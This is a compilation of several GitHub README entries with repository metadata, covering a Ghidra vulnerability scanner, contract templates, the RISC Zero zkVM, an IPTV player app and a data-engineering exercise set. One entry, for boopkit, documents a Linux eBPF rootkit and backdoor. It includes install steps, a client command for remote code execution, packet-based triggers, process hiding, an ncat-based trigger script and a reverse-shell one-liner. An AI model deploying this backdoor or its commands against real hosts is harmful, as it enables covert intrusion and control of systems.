+ Install the extension according to [Ghidra Extension Notes](https://ghidra-sre.org/InstallationGuide.html#GhidraExtensionNotes)
# Building
To build the extension yourself, for example if you want to develop a new feature, please refer to the [development guide](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Developer-Guide).
+ Install Ghidra and Z3
+ Install [Gradle 7.x](https://gradle.org/releases/) (tested version: 7.4)
+ Pull the repository
+ Run `gradle buildExtension` under repository root
+ The extension will be generated at `dist/${GhidraVersion}_${date}_BinAbsInspector.zip`
# Usage
You can run BinAbsInspector in headless mode, GUI mode, or with docker.
+ With Ghidra headless mode.
```
$GHIDRA_INSTALL_DIR/support/analyzeHeadless <projectPath> <projectName> -import <file> -postScript BinAbsInspector "@@<scriptParams>"
```
`<projectPath>` -- Ghidra project path.
`<projectName>` -- Ghidra project name.
`<scriptParams>` -- The arguments for our analyzer, which provides the following options (a concrete invocation is sketched after the table):
| Parameter | Description |
| ----------------------------------------- | --------------------------------------|
| `[-K <kElement>]` | KSet size limit [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#kset) |
| `[-callStringK <callStringMaxLen>]` | Call string maximum length [K](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details#context)|
| `[-Z3Timeout <timeout>]` | Z3 timeout |
| `[-timeout <timeout>]` | Analysis timeout |
| `[-entry <address>]` | Entry address |
| `[-externalMap <file>]` | External function model config |
| `[-json]` | Output in json format |
| `[-disableZ3]` | Disable Z3 |
| `[-all]` | Enable all checkers |
| `[-debug]` | Enable debugging log output |
| `[-check "<cweNo1>[;<cweNo2>...]"]` | Enable specific checkers |
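A concrete invocation might look like this (the project path, project name and binary are placeholders; the checker list and timeout are only examples — see the table above for the exact option syntax):

```bash
$GHIDRA_INSTALL_DIR/support/analyzeHeadless ~/ghidra_projects demo_project \
    -import ./target_binary \
    -postScript BinAbsInspector "@@-check \"CWE416;CWE476\" -timeout 1800 -json"
```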
+ With Ghidra GUI
1. Run Ghidra and import the target binary into a project
2. Analyze the binary with default settings
3. When the analysis is done, open `Window -> Script Manager` and find `BinAbsInspector.java`
4. Double-click on `BinAbsInspector.java` entry, set the parameters in configuration window and click OK
5. When the analysis is done, you can see the CWE reports in console window, double-click the addresses from the report can jump to corresponding address
+ With Docker
```shell
git clone git@github.com:KeenSecurityLab/BinAbsInspector.git
cd BinAbsInspector
docker build . -t bai
docker run -v $(pwd):/data/workspace bai "@@<script parameters>" -import <file>
```
# Implemented Checkers
So far BinAbsInspector supports following checkers:
+ [CWE78](https://cwe.mitre.org/data/definitions/78.html) (OS Command Injection)
+ [CWE119](https://cwe.mitre.org/data/definitions/119.html) (Buffer Overflow (generic case))
+ [CWE125](https://cwe.mitre.org/data/definitions/125.html) (Buffer Overflow (Out-of-bounds Read))
+ [CWE134](https://cwe.mitre.org/data/definitions/134.html) (Use of Externally-Controlled Format string)
+ [CWE190](https://cwe.mitre.org/data/definitions/190.html) (Integer overflow or wraparound)
+ [CWE367](https://cwe.mitre.org/data/definitions/367.html) (Time-of-check Time-of-use (TOCTOU))
+ [CWE415](https://cwe.mitre.org/data/definitions/415.html) (Double free)
+ [CWE416](https://cwe.mitre.org/data/definitions/416.html) (Use After Free)
+ [CWE426](https://cwe.mitre.org/data/definitions/426.html) (Untrusted Search Path)
+ [CWE467](https://cwe.mitre.org/data/definitions/467.html) (Use of sizeof() on a pointer type)
+ [CWE476](https://cwe.mitre.org/data/definitions/476.html) (NULL Pointer Dereference)
+ [CWE676](https://cwe.mitre.org/data/definitions/676.html) (Use of Potentially Dangerous Function)
+ [CWE787](https://cwe.mitre.org/data/definitions/787.html) (Buffer Overflow (Out-of-bounds Write))
# Project Structure
The structure of this project is as follows, please refer to [technical details](https://github.com/KeenSecurityLab/BinAbsInspector/wiki/Technical-Details) or the [Chinese version article](https://keenlab.tencent.com/zh/2022/04/20/2022-BinAbsInspector-public-release/) for more details.
```
├── main
│   ├── java
│   │   └── com
│   │       └── bai
│   │           ├── checkers                checker implementation
│   │           ├── env
│   │           │   ├── funcs               function modeling
│   │           │   │   ├── externalfuncs   external function modeling
│   │           │   │   └── stdfuncs        cpp std modeling
│   │           │   └── region              memory modeling
│   │           ├── solver                  analysis core and graph module
│   │           └── util                    utilities
│   └── resources
└── test
```
You can also build the javadoc with `gradle javadoc`; the API documentation will be generated in `./build/docs/javadoc`.
# Acknowledgement
We employ [Ghidra](https://ghidra-sre.org/) as our foundation and frequently leverage [JImmutable Collections](http://brianburton.github.io/java-immutable-collections/) for better performance.
Here we would like to thank them for their great help!
| BinAbsInspector: Vulnerability Scanner for Binaries | binary-analysis,ghidra,reverse-engineering,security,static-analyzer,vulnerability-scanner,abstract-interpretation | 1 | 7 | 24 | 21 | 18 | 1 | 4 |
Oak-Harbor-Kits/Contract-Templates | # Contract-Templates (US only)
Simply download the contracts and fill in all the highlighted portions. I use Adobe Sign to add signature fields and send contracts to be e-signed. Print the Word doc to a PDF, load that PDF into a new contract in Adobe Sign, and at the bottom add a signature field, a name field, and a title field for the client. When the client opens the email they will be directed to sign and add their name and title where you specified. Boom, contract signed, and it's saved in your account.
DISCLAIMER: This contract was written by my business contract lawyer, by downloading my contracts you are waiving the right to hold me or my lawyer liable for anything you do with it and that might come from it and your use of it. You are free to use these contracts and modify them to fit your businesses. As always, to be fully diligent, you may need to have a lawyer in your state look it over and make sure no adjustments are needed.
One contract has slightly different wording for monthly subscription clients, and the other is for clients who pay you a lump sum with no monthly commitment. But you can add hosting fees and domain registration fees or anything else you need in the contract. Make sure you put all your fees and everything in your contract supplemental to what I have provided.
Make sure you replace the highlighted text with yours and your clients info and pricing. Hope this is helpful!
**Contract was drafted for and in the state of Washington; you may need to consult a local state lawyer to make sure it will still work for your state.
**This document is only provided as a personal opinion and should NOT be considered as legal advice; for a legal opinion, you should consult a licensed attorney in your jurisdiction.
| null | null | 0 | 1 | 1 | 14 | 3 | 1 | 0 |
risc0/risc0 | > [!IMPORTANT]
> `main` is the development branch.
> When building applications or running examples, use the [latest release](https://github.com/risc0/risc0/releases) instead.
<p align="center">
<a href="https://risczero.com" target="_blank"><img src="website/static/img/logo.png" height="100"></a>
</p>
[![Crates.io][crates-badge]][crates-url]
[![MIT licensed][licence-badge]][licence-url]
[![Build Status][actions-badge]][actions-url]
[![Discord chat][discord-badge]][discord-url]
[![Twitter][twitter-badge]][twitter-url]
[actions-badge]: https://img.shields.io/github/actions/workflow/status/risc0/risc0/main.yml?branch=main
[actions-url]: https://github.com/risc0/risc0/actions?query=workflow%3ACI+branch%3Amain
[crates-badge]: https://img.shields.io/badge/crates.io-v1.0-orange
[crates-url]: https://crates.io/crates/risc0-zkvm
[discord-badge]: https://img.shields.io/discord/953703904086994974.svg?logo=discord&style=flat-square
[discord-url]: https://discord.gg/risczero
[licence-badge]: https://img.shields.io/github/license/risc0/risc0?color=blue
[licence-url]: https://github.com/risc0/risc0/blob/main/LICENSE
[twitter-badge]: https://img.shields.io/twitter/follow/risczero
[twitter-url]: https://twitter.com/risczero
[cargo-binstall]: https://github.com/cargo-bins/cargo-binstall#cargo-binaryinstall
[cargo-risczero-readme]: https://github.com/risc0/risc0/blob/main/risc0/cargo-risczero/README.md
[crates.io]: https://crates.io
[examples]: https://github.com/risc0/risc0/tree/main/examples
[install-rust]: https://doc.rust-lang.org/cargo/getting-started/installation.html
[risc-v]: https://en.wikipedia.org/wiki/RISC-V
[quickstart]: https://dev.risczero.com/api/zkvm/quickstart
[zk-proof]: https://en.wikipedia.org/wiki/Non-interactive_zero-knowledge_proof
[zksummit10-talk]: https://www.youtube.com/watch?v=wkIBN2CGJdc
[security-model]: https://dev.risczero.com/api/security-model
[proof-system-in-detail]: https://dev.risczero.com/proof-system-in-detail.pdf
[soundness.rs]: risc0/zkp/src/prove/soundness.rs
RISC Zero is a zero-knowledge verifiable general computing platform based on
[zk-STARKs][zk-proof] and the [RISC-V] microarchitecture.
A [zero knowledge proof][zk-proof] allows one party (the prover) to convince
another party (the verifier) that something is true without revealing all the
details. In the case of RISC Zero, the prover can show they correctly executed
some code (known to both parties), while only revealing to the verifier the
output of the code, not any of its inputs or any state during execution.
The code runs in a special virtual machine, called a _zkVM_. The RISC Zero zkVM
emulates a small [RISC-V] computer, allowing it to run arbitrary code in any
language, so long as a compiler toolchain exists that targets RISC-V. Currently,
SDK support exists for Rust, C, and C++.
## Protocol overview and terminology
First, the code to be proven must be compiled from its implementation language
into a _method_. A method is represented by a RISC-V ELF file with a special
entry point that runs the code of the method. Additionally, one can compute for
a given method its _image ID_ which is a special type of cryptographic hash of
the ELF file, and is required for verification.
Next, the host program runs and proves the method inside the zkVM. The logical
RISC-V machine running inside the zkVM is called the _guest_ and the prover
running the zkVM is called the _host_. The guest and the host can communicate
with each other during the execution of the method, but the host cannot modify
the execution of the guest in any way, or the proof being generated will be
invalid. During execution, the guest code can write to a special append-only log
called the _journal_ which represents the official output of the computation.
Presuming the method terminated correctly, a _receipt_ is produced, which
provides the proof of correct execution. This receipt consists of 2 parts: the
journal written during execution and a blob of opaque cryptographic data called
the _seal_.
The verifier can then verify the receipt and examine the log. If any tampering
was done to the journal or the seal, the receipt will fail to verify.
Additionally, it is cryptographically infeasible to generate a valid receipt
unless the output of the journal is the exactly correct output for some valid
execution of the method whose image ID matches the receipt. In summary, the
receipt acts as a zero-knowledge proof of correct execution.
Because the protocol is zero-knowledge, the verifier cannot infer anything about
the details of the execution or any data passed between the host and the guest
(aside from what is implied by the data written to the journal and the correct
execution of the code).
## Security
This code implements a [three-layer recursive proof system][zksummit10-talk],
based on the well-studied zk-STARK protocol and Groth16 protocol. An overview of
the underlying cryptographic assumptions can be found on our [Security
Model][security-model] page. With default parameters, this system achieves
perfect zero-knowledgeness and 98 bits of conjectured security. Our STARK
protocol is described in [Scalable, Transparent Arguments of RISC-V
Integrity][proof-system-in-detail], and a soundness/security calculator is
included in the [soundness.rs][soundness.rs] file.
To run the calculator, use `RUST_LOG=risc0_zkp=debug` when running a proof.
## Getting Started
To start your own project, you can use our `cargo risczero` tool to write the
initial boilerplate and set up a standard directory structure.
First, [install Rust][install-rust] if you don't already have it, then install
the RISC Zero toolchain installer, `rzup`. We'll use `rzup` to install
`cargo-risczero`.
To install `rzup` run the following command and follow the instructions:
```bash
curl -L https://risczero.com/install | bash
```
Next we can install the RISC Zero toolchain by running `rzup`:
```bash
rzup
```
You can verify the installation was successful by running:
```bash
cargo risczero --version
```
After installation, you can create a new project (named `my_project` in this example):
```bash
cargo risczero new my_project
```
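Assuming the default project template, you can then build and run the generated host program from the project root (the first build also compiles the guest, so it takes a while):

```bash
cd my_project
cargo run --release
```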
More details and options for `cargo risczero` are given in
[its README][cargo-risczero-readme].
For more guidance on how to use RISC Zero, how RISC Zero projects are typically
structured, and other resources useful to developers new to RISC Zero, see our
[Getting Started page][quickstart].
## Building from source
Building from source requires some additional tools and steps.
Please refer to [CONTRIBUTING.md](./CONTRIBUTING.md) for the full instructions.
## Rust Binaries
| crate | [crates.io] |
| -------------- | --------------------------------------------------------------------------------------------------- |
| cargo-risczero | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/cargo-risczero) |
| risc0-r0vm | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-r0vm) |
| risc0-tools | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-tools) |
## Rust Libraries
| crate | [crates.io] | [docs.rs](https://docs.rs) |
| --------------------------- | ---------------------------------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------- |
| bonsai-sdk | [![x](https://img.shields.io/badge/crates.io-v0.8-orange)](https://crates.io/crates/bonsai-sdk) | [![](https://img.shields.io/docsrs/bonsai-sdk)](https://docs.rs/bonsai-sdk) |
| risc0-binfmt | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-binfmt) | [![](https://img.shields.io/docsrs/risc0-binfmt)](https://docs.rs/risc0-binfmt) |
| risc0-build | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-build) | [![](https://img.shields.io/docsrs/risc0-build)](https://docs.rs/risc0-build) |
| risc0-build-kernel | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-build-kernel) | [![](https://img.shields.io/docsrs/risc0-build-kernel)](https://docs.rs/risc0-build-kernel) |
| risc0-circuit-recursion | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-recursion) | [![](https://img.shields.io/docsrs/risc0-circuit-recursion)](https://docs.rs/risc0-circuit-recursion) |
| risc0-circuit-recursion-sys | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-recursion-sys) | [![](https://img.shields.io/docsrs/risc0-circuit-recursion-sys)](https://docs.rs/risc0-circuit-recursion-sys) |
| risc0-circuit-rv32im | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-rv32im) | [![](https://img.shields.io/docsrs/risc0-circuit-rv32im)](https://docs.rs/risc0-circuit-rv32im) |
| risc0-circuit-rv32im-sys | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-circuit-rv32im-sys) | [![](https://img.shields.io/docsrs/risc0-circuit-rv32im-sys)](https://docs.rs/risc0-circuit-rv32im-sys) |
| risc0-core | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-core) | [![](https://img.shields.io/docsrs/risc0-core)](https://docs.rs/risc0-core) |
| risc0-groth16 | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-groth16) | [![](https://img.shields.io/docsrs/risc0-core)](https://docs.rs/risc0-groth16) |
| risc0-sys | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-sys) | [![](https://img.shields.io/docsrs/risc0-sys)](https://docs.rs/risc0-sys) |
| risc0-zkp | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-zkp) | [![](https://img.shields.io/docsrs/risc0-zkp)](https://docs.rs/risc0-zkp) |
| risc0-zkvm | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-zkvm) | [![](https://img.shields.io/docsrs/risc0-zkvm)](https://docs.rs/risc0-zkvm) |
| risc0-zkvm-platform | [![x](https://img.shields.io/badge/crates.io-v1.0-orange)](https://crates.io/crates/risc0-zkvm-platform) | [![](https://img.shields.io/docsrs/risc0-zkvm-platform)](https://docs.rs/risc0-zkvm-platform) |
## Feature flags
The following feature flags are present in one or more of the crates listed above:
| Feature | Target(s) | Implies | Description | Crates |
| ---------------- | ----------------- | ---------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------ | -------------------------------------------------------------------- |
| client | all except rv32im | std | Enables the client API. | risc0-zkvm |
| cuda | | prove, std | Enables CUDA GPU acceleration for the prover. Requires CUDA toolkit to be installed. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| disable-dev-mode | all except rv32im | | Disables dev mode so that proving and verifying may not be faked. Used to prevent a misplaced `RISC0_DEV_MODE` from breaking security in production systems. | risc0-zkvm |
| metal | macos | prove, std | Enables Metal GPU acceleration for the prover. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| prove | all except rv32im | std | Enables the prover, incompatible within the zkvm guest. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
| std | all | | Support for the Rust stdlib. | risc0-circuit-recursion, risc0-circuit-rv32im, risc0-zkp, risc0-zkvm |
## License
This project is licensed under the Apache2 license. See [LICENSE](LICENSE).
| RISC Zero is a zero-knowledge verifiable general computing platform based on zk-STARKs and the RISC-V microarchitecture. | stark,zero-knowledge,virtual-machine,risc-v,cryptography,rust | 42 | 111 | 1,475 | 1,150 | 141 | 114 | 8 |
Kimentanm/aptv | # APTV
🎉 🎉 APTV is now officially on the App Store, with support for program playback!
Supports iOS (including CarPlay), iPadOS, tvOS, watchOS, and macOS
<a href='https://apps.apple.com/cn/app/aptv/id1630403500'><img height='70' alt='Download from AppStore' src='https://img.whalenas.com:283/image/202207141215375.png' /></a>
## Telegram group
> [t.me/AptvPlayer](https://t.me/AptvPlayer)
## Introduction
A multi-purpose utility app for playing live TV streams
## Implemented features
- Add remote m3u files
- Play m3u8 files
- Channel playback (requires support from the stream source)
- Fetch live preview images of the current channel
- Fetch channel program guides
- iCloud sync
- Apple TV version
- Mac desktop version
- watchOS version
## Roadmap
- Aggregated configurations
- Search center
……
## iOS screenshots
### Channel list
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041149885.png" width="500"/>
### Favorites
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041152076.png" width="500"/>
### Playback page
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041156160.png" width="500"/>
### Configuration page
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041157217.png" width="500"/>
### Settings page
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041159967.png" width="500"/>
### About APTV
<img src="https://cdn.jsdelivr.net/gh/kimentanm/image-store/img/202207041158660.png" width="500"/>
## tvOS screenshots
### Channel list
<img src="https://img.whalenas.com:283/image/202207040045507.jpeg"/>
### Channel categories
<img src="https://img.whalenas.com:283/image/202207040045040.jpeg"/>
### Settings page
<img src="https://img.whalenas.com:283/image/202207040045038.jpeg"/>
## macOS screenshots
<img src="https://img.whalenas.com:283/image/202302010935657.png"/>
<img src="https://img.whalenas.com:283/image/202302010936574.png"/>
## watchOS screenshots
### Channel list
<img src="https://img.whalenas.com:283/image/202302010938951.png" width="500"/>
### Favorites
<img src="https://img.whalenas.com:283/image/202302010939520.png" width="500"/>
### Configuration page
<img src="https://img.whalenas.com:283/image/202302010939347.png" width="500"/>
### Playback page
<img src="https://img.whalenas.com:283/image/202302010941968.png" width="500"/>
## Test sources
> The following stream sources are for product testing only; do not redistribute them
> The following stream sources all come from the internet; I only collect and organize them, and take no responsibility for the privacy or copyright of the content
- IPTV: https://raw.githubusercontent.com/Kimentanm/aptv/master/m3u/iptv.m3u
- Playback test source: https://raw.githubusercontent.com/Kimentanm/aptv/master/m3u/aptv-playback.m3u
(This test source is updated irregularly; if some channels fail to play, refresh the configuration in the configuration center)
| 📺 A tool for playing m3u8 file | null | 0 | 2 | 1 | 251 | 20 | 1 | 0 |
krisnova/boopkit | ```
================================================================
██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██╗████████╗
██╔══██╗██╔═══██╗██╔═══██╗██╔══██╗██║ ██╔╝██║╚══██╔══╝
██████╔╝██║ ██║██║ ██║██████╔╝█████╔╝ ██║ ██║
██╔══██╗██║ ██║██║ ██║██╔═══╝ ██╔═██╗ ██║ ██║
██████╔╝╚██████╔╝╚██████╔╝██║ ██║ ██╗██║ ██║
╚═════╝ ╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝╚═╝ ╚═╝
Author: Kris Nóva <kris@nivenly.com> Version 1.4.0
IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES.
DO NOT ATTEMPT TO USE THE TOOLS TO VIOLATE THE LAW.
THE AUTHOR IS NOT RESPONSIBLE FOR ANY ILLEGAL ACTION.
MISUSE OF THE SOFTWARE, INFORMATION, OR SOURCE CODE
MAY RESULT IN CRIMINAL CHARGES.
Use at your own risk.
================================================================
Boopkit.
Linux rootkit and backdoor. Built using eBPF.
Usage:
boopkit [options]
Options:
-h, help Display help and usage for boopkit.
-i, interface Interface name. lo, eth0, wlan0, etc
-s, sudo-bypass Bypass sudo check. Breaks PID obfuscation.
-r, reverse-conn Attempt a reverse RCE lookup if no payload found.
-q, quiet Disable output.
-x, reject Source addresses to reject triggers from.
```
Linux backdoor, rootkit, and eBPF bypass tools.
Remote command execution over raw TCP.
- Tested on Linux kernel 5.16
- Tested on Linux kernel 5.17
- Remote code execution over TCP (SSH, Nginx, Kubernetes, etc)
- Network gateway bypass (bad checksums, TCP reset)
- Self obfuscation at runtime (eBPF process hiding)
##### Disclaimer
> This is **NOT** an exploit! This requires prior privileged access on a server in order to work!
> I am a professional security researcher. These are white hat tools used for research purposes only.
> Use this responsibly. Never use this software illegally.
![FSpgEXTacAYme8t](https://user-images.githubusercontent.com/13757818/168698377-9c1125d6-698d-4009-a599-56b275b54764.jpeg)
## Server Side
Download and build boopkit.
```bash
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.3.0.tar.gz
tar -xzf v1.3.0.tar.gz
cd boopkit-1.3.0/
make
sudo make install
```
Run boopkit in the foreground.
```bash
# Reject all boops on localhost and 10.0.0.1
boopkit -x 127.0.0.1 -x 10.0.0.1
```
Run boopkit in the background in quiet mode.
```bash
# Danger! This can be VERY hard to stop! Run this at your own risk!
boopkit -q &
```
Boopkit is now running and can be exploited using the client `boopkit-boop` command line tool.
## Client Side
Download and build boopkit.
```bash
wget https://github.com/kris-nova/boopkit/archive/refs/tags/v1.2.0.tar.gz
tar -xzf v1.2.0.tar.gz
cd boopkit-1.2.0/
make
sudo make install
```
Run boopkit-boop against the server.
```bash
# ===================
RCE="ls -la"
# ===================
LHOST="127.0.0.1"
LPORT="3535"
RHOST="127.0.0.1"
RPORT="22"
boopkit-boop \
-lhost $LHOST \
-lport $LPORT \
-rhost $RHOST \
-rport $RPORT \
-c "$RCE"
```
# Boop Vectors
Boopkit responds to two kinds of events on the network, both of which can be triggered with the `boopkit-boop` tool.
TCP Header Format. Taken from [RFC 793](https://datatracker.ietf.org/doc/html/rfc793#section-3.1). September 1981
```
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Source Port | Destination Port |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Sequence Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Acknowledgment Number |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Data | |U|A|P|R|S|F| |
| Offset| Reserved |R|C|S|S|Y|I| Window |
| | |G|K|H|T|N|N| |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Checksum | Urgent Pointer |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Options | Padding |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
{ data }
{ .... }
{ data }
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
```
### 1. Bad Checksum
First the `boopkit-boop` tool will send a malformed TCP SYN packet with an empty checksum to the server over a `SOCK_RAW` socket. This triggers `boopkit` remotely on any Linux server running it, regardless of which TCP services are running (or whether any are running at all).
Use `-p` with `boopkit-boop` to only use this first vector.
⚠️ Some modern network hardware will DROP all malformed checksum packets such as the one required to exploit boopkit using this vector!
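For intuition only, here is a minimal Python/scapy sketch of what a zero-checksum SYN probe could look like. It is not `boopkit-boop`'s actual implementation (that is written in C), and the host/port values are placeholders.

```python
# Illustrative sketch only (not part of boopkit): craft a TCP SYN whose checksum
# field is left at zero, using scapy. Sending raw packets requires root.
from scapy.all import IP, TCP, send

RHOST = "127.0.0.1"   # placeholder target running boopkit
RPORT = 22            # any port; no TCP service needs to be listening

# Setting chksum=0 explicitly stops scapy from auto-computing the checksum,
# so the SYN arrives malformed, which is the kind of packet this vector relies on.
malformed_syn = IP(dst=RHOST) / TCP(dport=RPORT, flags="S", chksum=0)
send(malformed_syn, verbose=False)
```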
### 2. Sending ACK-RST packet
Next the `boopkit-boop` tool will complete a valid TCP handshake with a `SOCK_STREAM` socket against a remote TCP service such as SSH, Kubernetes, Nginx, etc. After the initial TCP handshake is complete, `boopkit-boop` will repeat the process a 2nd time.
The second handshake flips the TCP RST flag in the packet, triggering a TCP reset on the server.
Either of these tactics is enough to independently trigger boopkit.
Various network hardware and runtime conditions will make either tactic more viable.
Boopkit will try both, and respond to both by default.
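For the second vector specifically, the handshake-then-reset behavior can be illustrated with a small Python sketch. Again, this is illustrative only and not the actual `boopkit-boop` code; the target address and port are placeholders. Setting `SO_LINGER` to zero makes the kernel send an RST on close:

```python
# Illustrative sketch only (not the actual boopkit-boop C implementation):
# complete a real TCP handshake with a listening service, then force an RST
# instead of a normal FIN when closing the connection.
import socket
import struct

RHOST, RPORT = "127.0.0.1", 22   # placeholder target and an open TCP port

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))        # normal three-way handshake completes here
# SO_LINGER with l_onoff=1 and l_linger=0 makes close() emit a TCP RST.
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER, struct.pack("ii", 1, 0))
s.close()
```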
# Boopscript
The `boopscript` file is a [Metasploit](https://github.com/rapid7/metasploit-framework) compatible script that can be used to remotely trigger the boopkit backdoor after `boopkit` is installed on a remote Linux machine.
```bash
# boopscript
RHOST="127.0.0.1"
RPORT="22"
LHOST="127.0.0.1"
LPORT="3535"
NCAT="/usr/bin/ncat"
NCATLISTENPORT="3545"
```
### Compile Time Dependencies
- `clang`
- `bpftool` Required for `libbpf`
- `xdp-tools` Required for `libxdp`
- `llvm`
- `pcap`
- `lib32-glibc`
### Reverse Shell Stabilization
```bash
python -c "import pty; pty.spawn('/bin/bash')"
```
### References
- [Tracepoints with BPF](https://lwn.net/Articles/683504/)
- [Raw TCP Sockets](https://github.com/MaxXor/raw-sockets-example)
- [Bad BPF](https://github.com/pathtofile/bad-bpf)
Credit to the original authors for their helpful code samples! I forked a lot of code for this project!
| Linux eBPF backdoor over TCP. Spawn reverse shells, RCE, on prior privileged access. Less Honkin, More Tonkin. | tcp,linux-kernel-hacking,ebpf,security | 8 | 1 | 1 | 248 | 11 | 1 | 0 |
danielbeach/data-engineering-practice | ## Data Engineering Practice Problems
One of the main obstacles in Data Engineering is the large
and varied set of technical skills that can be required on a
day-to-day basis.
*** Note - If you email a link to your GitHub repo with all the completed
exercises, I will send you back a free copy of my ebook Introduction to Data Engineering. ***
The aim of this repository is to help you develop and
learn those skills. Generally, these are the high-level
topics that the practice problems cover.
- Python data processing.
- csv, flat-file, parquet, json, etc.
- SQL database table design.
- Python + Postgres, data ingestion and retrieval.
- PySpark
- Data cleansing / dirty data.
### How to work on the problems.
You will need two things to work effectively on almost all
of these problems.
- `Docker`
- `docker-compose`
All the tools and technologies you need will be packaged
into the `dockerfile` for each exercise.
For each exercise you will need to `cd` into that folder and
run the `docker build` command; the exact command is listed in
the `README` for each exercise, so follow those instructions.
### Beginner Exercises
#### Exercise 1 - Downloading files.
The [first exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-1) tests your ability to download a number of files
from an `HTTP` source and unzip them, storing them locally with `Python`.
`cd Exercises/Exercise-1` and see `README` in that location for instructions.
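If you want a feel for the kind of code involved before opening the exercise, here is a minimal, illustrative Python sketch. The URL list is a placeholder, not the one used in the exercise.

```python
# Illustrative sketch only; the exercise defines its own URLs and requirements.
import io
import zipfile
import requests

urls = ["https://example.com/data/file1.zip"]  # placeholder URLs

for url in urls:
    resp = requests.get(url, timeout=30)
    resp.raise_for_status()
    # Extract the downloaded archive into a local downloads/ directory.
    with zipfile.ZipFile(io.BytesIO(resp.content)) as zf:
        zf.extractall("downloads")
```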
#### Exercise 2 - Web Scraping + Downloading + Pandas
The [second exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-2)
tests your ability to perform web scraping, build URIs, download files, and use Pandas to
do some simple cumulative actions.
`cd Exercises/Exercise-2` and see `README` in that location for instructions.
#### Exercise 3 - Boto3 AWS + s3 + Python.
The [third exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-3) tests a few skills.
This time we will be using a popular `aws` package called `boto3` to perform multi-step
actions that download some open-source `s3` data files.
`cd Exercises/Exercise-3` and see `README` in that location for instructions.
#### Exercise 4 - Convert JSON to CSV + Ragged Directories.
The [fourth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-4)
focuses on more file types, `json` and `csv`, and on working with them in `Python`.
You will have to traverse a ragged directory structure, finding any `json` files
and converting them to `csv`.
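As a rough, illustrative Python sketch of that traversal and conversion (the directory name and the flat record shape are assumptions, not the exercise's actual data):

```python
# Illustrative sketch only; the exercise defines the real directory layout and schema.
import csv
import json
from pathlib import Path

for json_path in Path("data").rglob("*.json"):      # walk the ragged directory tree
    records = json.loads(json_path.read_text())
    if isinstance(records, dict):                   # normalize a single object to a list
        records = [records]
    csv_path = json_path.with_suffix(".csv")
    with csv_path.open("w", newline="") as f:
        writer = csv.DictWriter(f, fieldnames=list(records[0].keys()))
        writer.writeheader()
        writer.writerows(records)
```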
#### Exercise 5 - Data Modeling for Postgres + Python.
The [fifth exercise](https://github.com/danielbeach/data-engineering-practice/tree/main/Exercises/Exercise-5)
is going to be a little different than the rest. In this problem you will be given a number of
